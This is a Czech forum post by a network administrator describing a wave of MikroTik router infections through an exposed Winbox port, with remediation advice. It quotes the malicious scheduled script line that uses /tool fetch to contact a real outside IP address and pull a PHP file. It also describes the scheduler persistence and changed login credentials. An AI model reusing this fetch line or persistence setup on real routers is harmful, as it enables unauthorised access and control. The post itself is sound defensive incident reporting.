U nás byl klid všechny MK při začátku této kauzy updatovány na 6.41.3/6.42.2. A nikde nic napadeno nebylo do včerejšího dne... Včera během jednoho dne se to zničeho nic dostalo do několika stovek MK.
- infikované jsou pouze stroje s veřejnou IP a nevyplněnou položkou našich IP rozsahů v IP-Services (Winbox s default portem 8291). Pokud je port jiný tam se to nikde nedostalo. Všechny ostatní položky v IP-services jsme měly vždy Disable (SSH,Telnet,WWW atd).. Takže to tam muselo přijit jedině přes Winbox/Dude (dle logu).
- a jsou dva případy infekce:
1. Ten lepší co jde vyřešit na dálku:
- Ve Files je soubor Mikrotik.php (nic nezabírá je úplně prázdný ani políčko textu), dle všeho jen pro otestování viru jestli se tam podaří nahrát soubor.
- V Script list je polozka script1_ v kterém je řádek: /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
- V Scheduleru je položka schedule1_ ,která každých 30sekund spouští script viz. výše. <--- ia0 -->vir.png<--- ia0 -->
Všechny tyto RB jsou bez restartu s uptimem desítky dní, nic jiného se tam nezměnilo, stačí to ručně smazat a vyplnit IP-Services + upgrade na 6.42.5 a je vyřešeno.
2. Ten horší případ:
Změněný Login a Heslo. Na dálku netuším jak vyřešit.... RB funguje jak má i s uptimem desítek dní, ale hotovo... bez získání hesla asi nezbyde nic jiného než Netinstall na místě nebo Fyzický reset a pak update FW a nová konfigurace... Port to nijak nezměnilo, protože piše špatný login i přes MacTelnet.
